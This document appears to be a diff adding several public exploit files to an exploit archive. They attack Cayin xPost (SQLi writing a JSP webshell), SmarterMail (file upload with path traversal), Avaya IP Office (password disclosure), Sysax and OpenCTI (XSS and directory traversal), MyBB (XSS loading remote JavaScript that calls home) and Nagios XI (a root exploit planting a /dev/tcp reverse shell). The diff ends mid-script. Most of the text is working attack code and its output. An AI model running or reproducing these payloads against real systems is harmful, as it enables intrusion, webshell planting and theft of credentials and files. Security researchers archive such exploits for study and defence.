ur____identif += b"\x49\x50\x3d\x70\x6f\x6f\x6c"
ur____identif += b"\x2e\x6e\x74\x70\x2e\x6f\x72"
ur____identif += b"\x67\x25\x32\x36" ##########"
ur____identif += (bytes(ex____command, "utf-8"))
ur____identif += b"\x25\x32\x36" ##############"
ht____request = requests.get(ur____identif, auth = ("webadmin", "admin"))
re____outputs = re.search("</html>\n(.*)", ht____request.text, flags = re.S).group().strip("</html>\n")
print(re____outputs)

121
exploits/multiple/webapps/48558.txt Normal file
View file

@ -0,0 +1,121 @@
# Title: Cayin Digital Signage System xPost 2.5 - Remote Command Injection
# Author:LiquidWorm
# Date: 2020-06-04
# Vendor: https://www.cayintech.com
# CVE: N/A
#!/usr/bin/env python3
#
#
# Cayin Digital Signage System xPost 2.5 Pre-Auth SQLi Remote Code Execution
#
#
# Vendor: CAYIN Technology Co., Ltd.
# Product web page: https://www.cayintech.com
# Affected version: 2.5.18103
# 2.0
# 1.0
#
# Summary: CAYIN xPost is the web-based application software, which offers a
# combination of essential tools to create rich contents for digital signage in
# different vertical markets. It provides an easy-to-use platform for instant
# data entry and further extends the usage of CAYIN SMP players to meet users'
# requirements of frequent, daily maintenance.
#
# Desc: CAYIN xPost suffers from an unauthenticated SQL Injection vulnerability.
# Input passed via the GET parameter 'wayfinder_seqid' in wayfinder_meeting_input.jsp
# is not properly sanitised before being returned to the user or used in SQL queries.
# This can be exploited to manipulate SQL queries by injecting arbitrary SQL code
# and execute SYSTEM commands.
#
# --------------------------------------------------------------------------------
# lqwrm@zslab:~$ python3 wayfinder.py 192.168.2.1:8888
# # Injecting...
# # Executing...
#
# Command: whoami
#
# nt authority\system
#
#
# You have a webshell @ http://192.168.2.1:8888/thricer.jsp
# lqwrm@zslab:~$
# --------------------------------------------------------------------------------
#
# Tested on: Microsoft Windows 10 Home
# Microsoft Windows 8.1
# Microsoft Windows Server 2016
# Microsoft Windows Server 2012
# Microsoft Windows 7 Ultimate SP1
# Apache Tomcat/9.0.1
# MySQL/5.0
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# @zeroscience
#
#
# Advisory ID: ZSL-2020-5571
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5571.php
#
#
# 15.05.2020
#
import requests as req
import time as vremeto
import sys as sistemot
import re as regularno
if len(sistemot.argv) < 2:
print("Cayin xPost 2.5 Pre-Auth SQLi RCE")
print("Usage: ./wayfinder.py ip:port")
sistemot.exit(19)
else:
ip = sistemot.argv[1]
filename = "thricer.jsp"
urlpath = "/cayin/wayfinder/wayfinder_meeting_input.jsp?wayfinder_seqid="
constr = "-251' UNION ALL SELECT "
print("# Injecting...")
cmdjsp = "0x3c2540207061676520696d706f72743d226a6176612e7574696c2e2a2c6a6176612"
cmdjsp += "e696f2e2a22253e0a3c250a2f2f0a2f2f204a53505f4b49540a2f2f0a2f2f20636d64"
cmdjsp += "2e6a7370203d20436f6d6d616e6420457865637574696f6e2028756e6978290a2f2f0"
cmdjsp += "a2f2f2062793a20556e6b6e6f776e0a2f2f206d6f6469666965643a2032372f30362f"
cmdjsp += "323030330a2f2f0a253e0a3c48544d4c3e3c424f44593e0a3c464f524d204d4554484"
cmdjsp += "f443d2247455422204e414d453d226d79666f726d2220414354494f4e3d22223e0a3c"
cmdjsp += "494e50555420545950453d227465787422204e414d453d22636d64223e0a3c494e505"
cmdjsp += "55420545950453d227375626d6974222056414c55453d2253656e64223e0a3c2f464f"
cmdjsp += "524d3e0a3c7072653e0a3c250a69662028726571756573742e676574506172616d657"
cmdjsp += "465722822636d64222920213d206e756c6c29207b0a20202020202020206f75742e70"
cmdjsp += "72696e746c6e2822436f6d6d616e643a2022202b20726571756573742e67657450617"
cmdjsp += "2616d657465722822636d642229202b20223c42523e22293b0a202020202020202050"
cmdjsp += "726f636573732070203d2052756e74696d652e67657452756e74696d6528292e65786"
cmdjsp += "56328726571756573742e676574506172616d657465722822636d642229293b0a2020"
cmdjsp += "2020202020204f757470757453747265616d206f73203d20702e6765744f757470757"
cmdjsp += "453747265616d28293b0a2020202020202020496e70757453747265616d20696e203d"
cmdjsp += "20702e676574496e70757453747265616d28293b0a202020202020202044617461496"
cmdjsp += "e70757453747265616d20646973203d206e65772044617461496e7075745374726561"
cmdjsp += "6d28696e293b0a2020202020202020537472696e672064697372203d206469732e726"
cmdjsp += "561644c696e6528293b0a20202020202020207768696c652028206469737220213d20"
cmdjsp += "6e756c6c2029207b0a202020202020202020202020202020206f75742e7072696e746"
cmdjsp += "c6e2864697372293b200a2020202020202020202020202020202064697372203d2064"
cmdjsp += "69732e726561644c696e6528293b200a202020202020202020202020202020207d0a2"
cmdjsp += "0202020202020207d0a253e0a3c2f7072653e0a3c2f424f44593e3c2f48544d4c3e0a"
cmdjsp += "0a0a"
columns = ",NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL "
sqlwrite = "INTO DUMPFILE 'C:/CayinApps/webapps/" + filename + "'-- -"
mysqli = constr + cmdjsp + columns + sqlwrite
r = req.get("http://" + ip + urlpath + mysqli, allow_redirects = True)
vremeto.sleep(1)
print("# Executing...")
r = req.get("http://" + ip + "/" + filename + "?cmd=whoami")
clean = regularno.compile("<pre>(.*)</pre>", flags = regularno.S).search(r.text)
clean = clean.group(1).replace("<BR>", "\n")
print(clean)
print("You have a webshell @ http://" + ip + "/" + filename)

134
exploits/multiple/webapps/48580.py Executable file
View file

@ -0,0 +1,134 @@
# Exploit Title: SmarterMail 16 - Arbitrary File Upload
# Google Dork: inurl:/interface/root
# Date: 2020-06-10
# Exploit Author: vvhack.org
# Vendor Homepage: https://www.smartertools.com
# Software Link: https://www.smartertools.com
# Version: 16.x
# Tested on: Windows
# CVE : N/A
#!/usr/bin/python3
import requests, json, argparse
from requests_toolbelt.multipart.encoder import MultipartEncoder
#example usage:
#Authenticated
#python3 exp.py -w http://mail.site.com/ -f ast.aspx
#Change username & password !
class Tak:
def __init__(self):
self.file_upload()
self.shell_upload()
def loginned(self):
self.urls = results.wbsn + '/api/v1/auth/authenticate-user'
self.myobja = {"username":"mail@mail.com","password":"password","language":"en"}
self.xx = requests.post(self.urls, data = self.myobja)
self.data = json.loads(self.xx.text)
self.das = self.data['accessToken']
self.headers = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0', 'Authorization': "Bearer " + self.das}
def loginned_folder(self):
self.loginned()
self.url = results.wbsn + '/api/v1/mail/messages'
myobj = {"folder":"drafts","ownerEmailAddress":"","sortType":5,"sortAscending":"false","query":"","skip":0,"take":151,"selectedIds":[]}
x = requests.post(self.url, data = myobj, headers=self.headers)
print(x.text)
def create_folder(self):
self.loginned()
self.urlz = results.wbsn + '/api/v1/filestorage/folder-put'
myobj = {"folder": "testos1", "parentFolder":"Root Folder\\"}
myobj2= {"folder": "testos2", "parentFolder":"Root Folder\\"}
x = requests.post(self.urlz, data = myobj, headers=self.headers)
x = requests.post(self.urlz, data = myobj2, headers=self.headers)
print(x.text)
def file_upload(self):
self.create_folder()
'''
#resumableChunkNumber=1&
#resumableChunkSize=2097152&resumableCurrentChunkSize=955319&resumableTotalSize=955319&
#resumableType=image%2Fjpeg&resumableIdentifier=955319-112097jpg&resumableFilename=112097.jpg&
#resumableRelativePath=112097.jpg&resumableTotalChunks=1", headers={'User-Agent': "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0",
#'Accept-Language': "en-US,en;q=0.5", 'Accept-Encoding': "gzip, deflate",
#print(self.xz)
#print(self.xz.headers)
'''
size = os.path.getsize(results.wbsf)
print(size)
replace_file = results.wbsf.replace(".","")
with open(results.wbsf, "rb") as outf:
contents = outf.read()
multipart_data = MultipartEncoder(
fields={
"context": "file-storage",
#"contextData": '{"folder":"Root Folder\\ " + str(results.wbsd) + "\\"}',
"contextData": '{"folder":"Root Folder\\\\testos1\\\\"}',
"resumableChunkNumber": "1",
"resumableChunkSize": "2097152",
"resumableCurrentChunkSize": str(size),
"resumableTotalSize": str(size),
"resumableType": "image/jpeg",
#"resumableIdentifier": "955319-112097jpg",
"resumableIdentifier": str(size) + "-" + str(replace_file),
"resumableFilename": results.wbsf,
"resumableRelativePath": results.wbsf,
"resumableTotalChunks": "1",
"file": (
'blob',#112097.jpg',
#open(file, "rb"),
contents,
#file,
#"image/jpeg"
"application/octet-stream"
#'text/plain'
)
}
)
'''
http_proxy = "http://127.0.0.1:8080"
proxyDict = {
"http" : http_proxy,
}
'''
# if you want to activate intercept then add with that argument, this parameter is necessary requiresfunc(if you want to activate it, please remove it from the comment line.) >> proxies=proxyDict
self.dre = requests.post(url=results.wbsn + "/api/upload",headers={"Content-Type": multipart_data.content_type,
'Authorization': "Bearer " + self.das,
'User-Agent': "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0"},data=multipart_data)
def shell_upload(self):
'''
http_proxy = "http://127.0.0.1:8080"
proxyDict = {
"http" : http_proxy,
}
'''
json_data = {
"folder": "Root Folder\\testos1\\",
"newFolderName": "\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\program files (x86)\\SmarterTools\\SmarterMail\\MRS\\testos1\\",
"parentFolder": "",
"newParentFolder": "Root Folder\\testos2"
}
#r = requests.post('http://mail.site.com/api/v1/filestorage/folder-patch', json=json_data, headers=self.headers, proxies=proxyDict)
r = requests.post(results.wbsn+'/api/v1/filestorage/folder-patch', json=json_data, headers=self.headers)
print(results.wbsn + "/testos1/" + results.wbsf)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('-f', action='store', dest='wbsf',
help='Filename')
parser.add_argument('-w', action='store', dest='wbsn',
help='Target')
parser.add_argument('--version', action='version', version='SmartMail Knock Knock')
results = parser.parse_args()
tako = Tak()
tako

93
exploits/multiple/webapps/48581.txt Normal file
View file

@ -0,0 +1,93 @@
# Exploit Title: Avaya IP Office 11 - Password Disclosure
# Exploit Author: hyp3rlinx
# Date: 2020-06-09
# Vender Homepage: https://downloads.avaya.com
# Product Link: https://downloads.avaya.com/css/P8/documents/101067493
# CVE: CVE-2020-7030
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/AVAYA-IP-OFFICE-INSECURE-TRANSIT-PASSWORD-DISCLOSURE.txt
[+] twitter.com/hyp3rlinx
[+] ISR: ApparitionSec
[Vendor]
www.avaya.com
[Product]
Avaya IP Office v9.1.8.0 - 11
IP Office Platform provides a single, stackable, scalable small business communications system that grows with your business easily and cost-effectively.
[Vulnerability Type]
Insecure Transit Password Disclosure
[CVE Reference]
CVE-2020-7030
ASA-2020-077
[Security Issue]
A sensitive information disclosure vulnerability exists in the web interface component of IP Office that
may potentially allow a local user to gain unauthorized access to the component.
The request URL on port 7071 and the web socket component requests on port 7070 used by Atmosphere-Framework
within Avaya IP Office, pass Base64 encoded credentials as part of the URL query string.
https://<TARGET-IP>:7071/serveredition/autologin?auth=QWRtaW5pc3RyYXRvcjpBZG1pbmlzdHJhdG9y&referrer=https://x.x.x.x:7070&lang=en_US
wss://<TARGET-IP>:7070/WebManagement/webmanagement/atmosphere/QWRtaW5pc3RyYXRvcjpBZG1pbmlzdHJhdG9y?X-Atmosphere-tracking-id=0&
X-Atmosphere-Framework=2.0.5-javascript&X-Atmosphere-Transport=websocket&X-Cache-Date=0&Content-Type=text/x-gwt-rpc;%20charset=UTF-8&X-atmo-protocol=true
Base64 credentials: QWRtaW5pc3RyYXRvcjpBZG1pbmlzdHJhdG9y
Value: Administrator:Administrator
The Base64 encoded credentials can be easily disclosed if the machine used to logon to the web Manager is accessed by an attacker.
The URL plus the credentials can potentially be leaked or stored in some of the following locations.
Browser History
Browser Cache
Browser Developer Tools
Cached by web proxy
Referer Header
Web Logs
Shared Systems
[Avaya Products affected]
Avaya IP Office 9.x, 10.0 through 10.1.0.7, 11.0 through 11.0.4.2
[References]
https://downloads.avaya.com/css/P8/documents/101067493
[Network Access]
Remote
[Severity]
Medium
[Disclosure Timeline]
Vendor Notification: February 19, 2020
Vendor confirms issue: March 4, 2020
Vendor release advisory fix : June 3, 2020
June 4, 2020 : Public Disclosure
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).
hyp3rlinx

17
exploits/multiple/webapps/48582.txt Normal file
View file

@ -0,0 +1,17 @@
# Exploit Title: Sysax MultiServer 6.90 - Reflected Cross Site Scripting
# Google Dork: n.d.
# Date: 2020-06-02
# Exploit Author: Luca Epifanio (wrongsid3)
# Vendor Homepage: https://www.sysax.com/
# Software Link: https://www.sysax.com/download.htm
# Version: MultiServer 6.90
# Tested on: Windows 10 x64
# CVE : CVE-2020-13228
There is reflected XSS via the /scgi sid parameter.
PoC:
http://192.168.88.131/scgi?sid=684216c78659562c92775c885e956585cdb180fd
<script>alert("XSS")</script>&pid=transferpage2_name1_fff.htm
PoC Screen: https://pasteboard.co/J9eE2GQ.png

100
exploits/multiple/webapps/48595.txt Normal file
View file

@ -0,0 +1,100 @@
# Exploit Title: OpenCTI 3.3.1 - Directory Traversal
# Date: 2020-03-05
# Exploit Author: Raif Berkay Dincel
# Vendor Homepage: www.opencti.io/
# Software [https://github.com/OpenCTI-Platform/opencti/releases/tag/3.3.1]
# Version: [3.3.1]
# CVE-ID: N/A
# Tested on: Linux Mint / Windows 10
# Vulnerabilities Discovered Date : 2020/03/05 [YYYY/MM/DD]
# As a result of the research, two vulnerability were identified. (Directory Traversal & Cross Site Scripting [XSS])
# Technical information is provided below step by step.
# [1] - Directory Traversal Vulnerability
# Vulnerable Parameter Type: GET
# Vulnerable Parameter: TARGET/static/css/[Payload]
# Proof of Concepts:
https://TARGET/static/css//../../../../../../../../etc/passwd
# HTTP Request:
GET /static/css//../../../../../../../../etc/passwd HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Cookie: connect.sid=s%3ATkG_XOPI-x4FclzoLAZvx_oBEHaTkG4N.kwp3h9LAyBrG03SzzT8ApZu0CRaUwI5CP7yizXTerYM; opencti_token=df8635b1-39b5-41c2-8873-2f19b0e6ca8c
Upgrade-Insecure-Requests: 1
# HTTP Response
HTTP/1.1 200 OK
X-DNS-Prefetch-Control: off
X-Frame-Options: SAMEORIGIN
Strict-Transport-Security: max-age=15552000; includeSubDomains
X-Download-Options: noopen
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Content-Type: text/css; charset=utf-8
ETag: W/"500-eiHlcjY0lWovE9oQsRof3WWtG1o"
Vary: Accept-Encoding
Date: Sun, 03 May 2020 01:25:21 GMT
Connection: close
Content-Length: 1280
root:x:0:0:root:/root:/bin/ash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/usr/lib/news:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucppublic:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
man:x:13:15:man:/usr/man:/sbin/nologin
postmaster:x:14:12:postmaster:/var/spool/mail:/sbin/nologin
cron:x:16:16:cron:/var/spool/cron:/sbin/nologin
ftp:x:21:21::/var/lib/ftp:/sbin/nologin
sshd:x:22:22:sshd:/dev/null:/sbin/nologin
at:x:25:25:at:/var/spool/cron/atjobs:/sbin/nologin
squid:x:31:31:Squid:/var/cache/squid:/sbin/nologin
xfs:x:33:33:X Font Server:/etc/X11/fs:/sbin/nologin
games:x:35:35:games:/usr/games:/sbin/nologin
postgres:x:70:70::/var/lib/postgresql:/bin/sh
cyrus:x:85:12::/usr/cyrus:/sbin/nologin
vpopmail:x:89:89::/var/vpopmail:/sbin/nologin
ntp:x:123:123:NTP:/var/empty:/sbin/nologin
smmsp:x:209:209:smmsp:/var/spool/mqueue:/sbin/nologin
guest:x:405:100:guest:/dev/null:/sbin/nologin
nobody:x:65534:65534:nobody:/:/sbin/nologin
node:x:1000:1000:Linux User,,,:/home/node:/bin/sh
# [2] - Cross Site Scripting (XSS) Vulnerability
# Vulnerable Parameter Type: GET
# Vulnerable Parameter: TARGET/graphql?[Payload]
# Proof of Concepts:
TARGET/graphql?'"--></style></scRipt><scRipt>alert('Raif_Berkay')</scRipt>
https://TARGET/graphql?%27%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Ealert(%27Raif_Berkay%27)%3C/scRipt%3E
# HTTP Request:
GET /graphql?'"--></style></scRipt><scRipt>alert('Raif_Berkay')</scRipt> HTTP/1.1
Host: TARGET
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: opencti_token=2b4f29e3-5ea8-4890-8cf5-a76f61f1e2b2; connect.sid=s%3AB8USExilsGXulGOc09fo92piRjpWNtUo.GZ9pmhOf7i1l78t%2BHVk9zh9AQ9BTO%2BHvCRix3iXv6iw
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36

109
exploits/php/webapps/47161.php Normal file
View file

@ -0,0 +1,109 @@
/*
# Exploit Title: MyBB < 1.8.21 Authenticated RCE
# Date: July 24, 2019
# Exploit Author: Giovanni Chhatta (https://www.linkedin.com/in/giovannichhatta/)
# Vendor Homepage: https://mybb.com/
# Software Link: https://resources.mybb.com/downloads/mybb_1820.zip
# Version: 1.8.20
# Tested on: Windows 10
# Blog: https://blog.ripstech.com/2019/mybb-stored-xss-to-rce/
Example payload: [video=youtube]http://test/test#[url]onload='script=document.createElement(%22script%22);script.src=%22https://giovan.nl/mybb.js%22;document.body.append(script);'//[/url][/video]
This payload fetches another JS file (mybb.js), hosted on a VPS.
NOTE: Mybb's textbox will dynamically change apostrophes (') to &#39; . To fix this just manually change them back to apostrophes and hit 'send'.
The payload will trigger once an admin views the message.
*/
/*
* mybb.js
*/
function postReq(toUrl,body,setHeaders = true){
var xhr = new XMLHttpRequest();
xhr.open("POST",toUrl,false);
if(setHeaders){
xhr.setRequestHeader("User-Agent","Mozilla/5.0 (Windows NT 10.0; WOW64; rv:66.0) Gecko/20100101 Firefox/66.0");
xhr.setRequestHeader("Accept","text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
xhr.setRequestHeader("Accept-Language","nl,en-US;q=0.7,en;q=0.3");
xhr.setRequestHeader("Content-Type","multipart/form-data; boundary=---------------------------21840354016818");
xhr.setRequestHeader("Upgrade-Insecure-Requests","1");
}else{
xhr.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
}
xhr.send(body);
}
function getReq(toUrl, property = true){
var xhr = new XMLHttpRequest();
xhr.open("GET",toUrl,false);
xhr.send();
prop = property ? xhr.responseText : xhr.status;
return prop;
}
function upload(url,key,payload){
url = url + "admin/index.php?module=style-themes&action=import";
data = "-----------------------------21840354016818\r\nContent-Disposition: form-data; name=\"my_post_key\"\r\n\r\n"+key+"\r\n-----------------------------21840354016818\r\nContent-Disposition: form-data; name=\"import\"\r\n\r\n0\r\n-----------------------------21840354016818\r\nContent-Disposition: form-data; name=\"local_file\"; filename=\"shel1l.xml\"\r\nContent-Type: text/xml\r\n\r\n"+payload+"\r\n-----------------------------21840354016818\r\nContent-Disposition: form-data; name=\"url\"\r\n\r\n\r\n-----------------------------21840354016818\r\nContent-Disposition: form-data; name=\"tid\"\r\n\r\n1\r\n-----------------------------21840354016818\r\nContent-Disposition: form-data; name=\"name\"\r\n\r\n\r\n-----------------------------21840354016818\r\nContent-Disposition: form-data; name=\"version_compat\"\r\n\r\n1\r\n-----------------------------21840354016818\r\nContent-Disposition: form-data; name=\"import_stylesheets\"\r\n\r\n1\r\n-----------------------------21840354016818\r\nContent-Disposition: form-data; name=\"import_templates\"\r\n\r\n1\r\n-----------------------------21840354016818--\r\n";
postReq(url,data);
}
function fakeDiv(body){
var div = document.createElement('div');
div.innerHTML = body;
div.setAttribute("id","fakediv");
document.body.append(div);
var themeLink = document.getElementsByClassName("popup_item")[2].href;
var themeID = themeLink.substring(themeLink.indexOf("tid")+4,themeLink.length);
document.getElementById("fakediv").remove();
return themeID;
}
function getThemeID(url){
url = url + "admin/index.php?module=style-themes";
responseBody = getReq(url);
return fakeDiv(responseBody);
}
function editStylesheet(url,key,tid,filename){
url = url + "admin/index.php?module=style-themes&action=edit_stylesheet&mode=advanced";
data = "my_post_key="+key+"&tid="+tid+"&file="+filename+"&stylesheet=%3C%3Fphp+system%28%24_GET%5B1%5D%29%3B+%3F%3E&save=Save+Changes";
postReq(url,data,false);
}
function checkShell(url,theme,filename){
url = url + "cache/themes/theme" + theme + "/" + filename;
if(getReq(url,false) == 200){
console.log("[*] Shell found in theme " + theme);
window.open(host + "cache/themes/theme"+theme+"/"+filename+"?1=whoami");
}else{
console.log("[!] Exploit failed: Couldn't find shell.")
}
}
function callHome(theme){
let IP = "10.11.6.96"; // Change this
let port = 1234; // Change this
let url = "http://" + IP + ":" + port + "/" + document.domain + "/isPwned/theme" + theme;
getReq(url);
}
isAdmin = false;
host = location.href.split('/')[0] + "//" + location.href.split('/')[2] + "/mybb/"; // Change last part
key = document.getElementsByName("my_post_key")[0].value;
filename = "910910910910910910910910xD.php";
payload = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\r\n<theme>\r\n<stylesheets>\r\n<stylesheet name=\""+filename+".css\">\r\ngecko\r\n</stylesheet>\r\n</stylesheets>\r\n</theme>"
upload(host,key,payload);
theme = getThemeID(host);
editStylesheet(host,key,theme,filename);
isAdmin ? checkShell(host,theme,filename) : callHome(theme);

219
exploits/php/webapps/47299.php Normal file
View file

@ -0,0 +1,219 @@
<?php
/*
A vulnerability exists in Nagios XI <= 5.6.5 allowing an attacker to leverage an RCE to escalate privileges to root.
The exploit requires access to the server as the 'nagios' user, or CCM access via the web interface with perissions to manage plugins.
The getprofile.sh script, invoked by downloading a system profile (profile.php?cmd=download),
is executed as root via a passwordless sudo entry; the script executes the check_plugin executuable which is owned by the nagios user
A user logged into Nagios XI with permissions to modify plugins, or the 'nagios' user on the server,can modify the check_plugin executable
and insert malicious commands exectuable as root.
Author: Jak Gibb (https://github.com/jakgibb/nagiosxi-root-exploit)
Date discovered: 28th July 2019
Reported to Nagios: 29th July 2019
Confirmed by Nagios: 29th July 2019
*/
$userVal = parseArgs($argv);
checkCookie();
$userVal['loginNSP'] = extractNSP($userVal['loginUrl']);
authenticate($userVal);
$userVal['pluginNSP'] = extractNSP($userVal['pluginUrl']);
uploadPayload($userVal);
triggerPayload($userVal);
function extractNSP($url) {
$curl = curl_init();
curl_setopt($curl, CURLOPT_URL, $url);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, TRUE);;
curl_setopt($curl, CURLOPT_COOKIEJAR, 'cookie.txt');
curl_setopt($curl, CURLOPT_COOKIEFILE, 'cookie.txt');
curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, FALSE);
curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, FALSE);
echo "[+] Grabbing NSP from: {$url}\n";
$response = curl_exec($curl);
$httpCode = curl_getinfo($curl, CURLINFO_HTTP_CODE);
if ($httpCode == '200') {
echo "[+] Retrieved page contents from: {$url}\n";
} else {
echo "[+] Unable to open page: {$url} to obtain NSP\n";
exit(1);
}
$DOM = new DOMDocument();
@$DOM->loadHTML($response);
$xpath = new DOMXpath($DOM);
$input = $xpath->query('//input[@name="nsp"]');
$nsp = $input->item(0)->getAttribute('value');
if (isset($nsp)) {
echo "[+] Extracted NSP - value: {$nsp}\n";
} else {
echo "[+] Unable to obtain NSP from {$url}\n";
exit(1);
}
return $nsp;
}
function authenticate($userVal) {
$postValues = array(
'username' => $userVal['user'], 'password' => $userVal['pass'],
'pageopt' => 'login', 'nsp' => $userVal['loginNSP']
);
$curl = curl_init();
curl_setopt($curl, CURLOPT_URL, $userVal['loginUrl']);
curl_setopt($curl, CURLOPT_POST, TRUE);
curl_setopt($curl, CURLOPT_POSTFIELDS, http_build_query($postValues));
curl_setopt($curl, CURLOPT_REFERER, $userVal['loginUrl']);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, TRUE);
curl_setopt($curl, CURLOPT_COOKIEJAR, 'cookie.txt');
curl_setopt($curl, CURLOPT_COOKIEFILE, 'cookie.txt');
curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, FALSE);
curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, FALSE);
echo "[+] Attempting to login...\n";
curl_exec($curl);
if (curl_getinfo($curl, CURLINFO_HTTP_CODE) == '302') {
echo "[+] Authentication success\n";
} else {
echo "[+] Unable to plguin, check your credentials\n";
exit(1);
}
echo "[+] Checking we have admin rights...\n";
curl_setopt($curl, CURLOPT_URL, $userVal['pluginUrl']);
$response = curl_exec($curl);
$title = NULL;
$dom = new DOMDocument();
if (@$dom->loadHTML($response)) {
$dom->getElementsByTagName("title")->length > 0 ? $title = $dom->getElementsByTagName("title")->item(0)->textContent : FALSE;
}
if (strpos($title, 'Manage') !== FALSE) {
echo "[+] Admin access confirmed\n";
} else {
echo "[+] Unable to reach login page, are you admin?\n";
exit(1);
}
}
function uploadPayload($userVal) {
$payload = "-----------------------------18467633426500\nContent-Disposition: form-data; name=\"upload\"\n\n1\n-----------------------------18467633426500\nContent-Disposition: form-data; name=\"nsp\"\n\n{$userVal['pluginNSP']}\n-----------------------------18467633426500\nContent-Disposition: form-data; name=\"MAX_FILE_SIZE\"\n\n20000000\n-----------------------------18467633426500\nContent-Disposition: form-data; name=\"uploadedfile\"; filename=\"check_ping\"\nContent-Type: text/plain\n\nbash -i >& /dev/tcp/{$userVal['reverseip']}/{$userVal['reverseport']} 0>&1\n-----------------------------18467633426500--\n";
$curl = curl_init();
curl_setopt($curl, CURLOPT_URL, $userVal['pluginUrl']);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($curl, CURLOPT_POSTFIELDS, $payload);
curl_setopt($curl, CURLOPT_POST, 1);
curl_setopt($curl, CURLOPT_ENCODING, 'gzip, deflate');
curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, FALSE);
curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, FALSE);
curl_setopt($curl, CURLOPT_COOKIEFILE, 'cookie.txt');
$headers = array();
$headers[] = 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8';
$headers[] = 'Accept-Language: en-GB,en;q=0.5';
$headers[] = 'Referer: ' . $userVal['pluginUrl'];
$headers[] = 'Content-Type: multipart/form-data; boundary=---------------------------18467633426500';
$headers[] = 'Connection: keep-alive';
$headers[] = 'Upgrade-Insecure-Requests: 1';
curl_setopt($curl, CURLOPT_HTTPHEADER, $headers);
echo "[+] Uploading payload...\n";
$response = curl_exec($curl);
$dom = new DOMDocument();
@$dom->loadHTML($response);
$upload = FALSE;
foreach ($dom->getElementsByTagName('div') as $div) {
if ($div->getAttribute('class') === 'message') {
if (strpos($div->nodeValue, 'New plugin was installed') !== FALSE) {
$upload = TRUE;
}
}
}
if ($upload) {
echo "[+] Payload uploaded\n";
} else {
echo '[+] Unable to upload payload';
exit(1);
}
}
function triggerPayload($userVal) {
$curl = curl_init();
curl_setopt($curl, CURLOPT_URL, $userVal['profileGenUrl']);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($curl, CURLOPT_ENCODING, 'gzip, deflate');
curl_setopt($curl, CURLOPT_COOKIEFILE, 'cookie.txt');
$headers = array();
$headers[] = 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8';
$headers[] = 'Connection: keep-alive';
$headers[] = 'Upgrade-Insecure-Requests: 1';
curl_setopt($curl, CURLOPT_HTTPHEADER, $headers);
echo "[+] Triggering payload: if successful, a reverse shell will spawn at {$userVal['reverseip']}:{$userVal['reverseport']}\n";
curl_exec($curl);
}
function showHelp() {
echo "Usage: php exploit.php --host=example.com --ssl=[true/false] --user=username --pass=password --reverseip=ip --reverseport=port\n";
exit(0);
}
function parseArgs($argv) {
$userVal = array();
for ($i = 1; $i < count($argv); $i++) {
if (preg_match('/^--([^=]+)=(.*)/', $argv[$i], $match)) {
$userVal[$match[1]] = $match[2];
}
}
if (!isset($userVal['host']) || !isset($userVal['ssl']) || !isset($userVal['user']) || !isset($userVal['pass']) || !isset($userVal['reverseip']) || !isset($userVal['reverseport'])) {
showHelp();
}
$userVal['ssl'] == 'true' ? $userVal['proto'] = 'https://' : $userVal['proto'] = 'http://';
$userVal['loginUrl'] = $userVal['proto'] . $userVal['host'] . '/nagiosxi/login.php';
